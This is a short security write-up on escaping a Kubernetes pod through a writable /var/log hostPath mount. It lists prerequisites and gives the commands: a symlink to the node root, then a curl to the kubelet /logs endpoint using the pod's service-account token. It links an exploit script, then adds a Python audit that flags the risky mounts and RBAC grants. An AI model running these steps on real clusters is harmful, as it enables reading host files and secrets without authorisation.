Mount /var/log under k8s to escape

Prerequisites

  • The node's /var/log is mounted into the pod (a hostPath volume) and is writable from the container
  • The container runs in a Kubernetes (k8s) environment
  • The service account of the current pod is allowed to get, list or watch node logs (the log subresource of nodes that the kubelet checks for its /logs endpoint)

Vulnerability detection

In the Container

kubectl exec --stdin --tty escaper -- /bin/bash

Here the node's /var/log is mounted into the container at /var/log/host. Create a symlink inside that directory that points at the node's root filesystem:

cd /var/log/host
ln -s / ./root_link

Because the kubelet's /logs endpoint follows that symlink, the node's files can now be read through it with the pod's service-account token:

token=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl -k https://172.17.0.1:10250/logs/root_link/ -H "Authorization: Bearer $token"

Or use this script, which collects sensitive files from the node in one step:

https://github.com/danielsagi/kube-pod-escape

Test at your own risk
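Both prerequisites above are things a cluster operator can audit before anyone tries the steps. The following is an added example, not part of this post or of the linked script: it walks pod specs and RBAC rules as plain dicts (the shape `kubectl get pods -o json` and `kubectl get clusterroles -o json` return) and flags hostPath volumes under /var/log that a container mounts, noting whether the mount is writable, plus roles that grant get, list or watch on nodes/log. The sample pod and role are constructed for the example. A read-only volumeMount (`readOnly: true`) stops the `ln -s` step, and dropping nodes/log from the service account's roles stops the kubelet from serving the listing; those are the two knobs the audit points at.

```python
"""Audit pod specs and RBAC rules for the preconditions of the /var/log
host-mount escape: a hostPath volume under /var/log mounted into a container
(writable or not), and a service account allowed to read nodes/log.

Added example working on plain dicts, so it runs offline on the constructed
samples at the bottom; feed it the JSON from kubectl to run it on a cluster.
"""
import posixpath

HOST_LOG_DIR = "/var/log"


def _under_var_log(path):
    """True if `path` is /var/log itself or any directory below it."""
    norm = posixpath.normpath(path)
    return norm == HOST_LOG_DIR or norm.startswith(HOST_LOG_DIR + "/")


def risky_log_mounts(pod):
    """Return (container, mountPath, hostPath, writable) for every hostPath
    volume under /var/log that a container or initContainer mounts.

    A writable mount lets the container create the symlink the escape needs;
    a read-only mount still exposes host logs, so it is reported with
    writable=False.
    """
    spec = pod.get("spec", {})
    host_paths = {
        v["name"]: v["hostPath"]["path"]
        for v in spec.get("volumes", [])
        if "hostPath" in v and _under_var_log(v["hostPath"]["path"])
    }
    findings = []
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        for m in c.get("volumeMounts", []):
            if m["name"] in host_paths:
                findings.append((c["name"], m["mountPath"],
                                 host_paths[m["name"]],
                                 not m.get("readOnly", False)))
    return findings


def grants_node_log_read(role):
    """True if a Role/ClusterRole grants get, list or watch on nodes/log.

    The kubelet authorizes its /logs endpoint as the `log` subresource of
    `nodes` in the core API group; wildcard verbs or resources count too.
    """
    for rule in role.get("rules", []):
        groups = rule.get("apiGroups", [])
        if "" not in groups and "*" not in groups:
            continue
        resources = set(rule.get("resources", []))
        verbs = set(rule.get("verbs", []))
        if ("nodes/log" in resources or "*" in resources) and \
                verbs & {"get", "list", "watch", "*"}:
            return True
    return False


def escape_possible(pod, roles):
    """True when a writable /var/log hostPath mount and a node-log-reading
    role are both present, i.e. both prerequisites of the escape hold."""
    writable = any(w for _, _, _, w in risky_log_mounts(pod))
    return writable and any(grants_node_log_read(r) for r in roles)


# Constructed samples (not taken from any real cluster).
SAMPLE_POD = {
    "metadata": {"name": "escaper"},
    "spec": {
        "volumes": [
            {"name": "host-logs", "hostPath": {"path": "/var/log"}},
            {"name": "scratch", "emptyDir": {}},
        ],
        "containers": [{
            "name": "app",
            "volumeMounts": [
                {"name": "host-logs", "mountPath": "/var/log/host"},
                {"name": "scratch", "mountPath": "/tmp/scratch"},
            ],
        }],
    },
}

SAMPLE_ROLE = {
    "metadata": {"name": "log-reader"},
    "rules": [{"apiGroups": [""], "resources": ["nodes/log"],
               "verbs": ["get"]}],
}

if __name__ == "__main__":
    for c, mnt, host, writable in risky_log_mounts(SAMPLE_POD):
        print(f"{c}: {host} -> {mnt} (writable={writable})")
    print("role grants nodes/log:", grants_node_log_read(SAMPLE_ROLE))
    print("escape possible:", escape_possible(SAMPLE_POD, [SAMPLE_ROLE]))
```

Marking the mount `readOnly: true` in the sample makes `escape_possible` return False while the mount itself is still listed, which is the distinction an audit report should keep: exposure of host logs is one finding, a path to the node's whole filesystem is another.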

#k8s

Reference: https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts
